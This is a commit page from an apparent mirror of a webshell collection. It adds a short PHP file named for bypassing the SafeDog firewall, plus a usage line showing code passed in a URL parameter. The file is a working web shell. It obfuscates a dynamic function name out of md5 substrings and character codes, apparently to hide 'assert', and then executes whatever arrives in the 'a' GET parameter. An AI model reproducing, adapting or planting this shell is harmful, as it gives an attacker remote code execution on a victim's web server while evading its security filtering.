mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create bypass-safedog-2016-08-29.php
usage: http://xx.xx/xx.php?a=phpinof()
This commit is contained in:
parent
db0431a444
commit
79a9b5885c
1 changed files with 5 additions and 0 deletions
5
php/bypass-safedog-2016-08-29.php
Normal file
5
php/bypass-safedog-2016-08-29.php
Normal file
|
@ -0,0 +1,5 @@
|
|||
<?php
|
||||
$a=md5('a').'<br>';
|
||||
$poc=substr($a,14,1).chr(115).chr(115).substr($a,22,1).chr(114).chr(116);
|
||||
$poc($_GET['a']);
|
||||
?>
|
Loading…
Reference in a new issue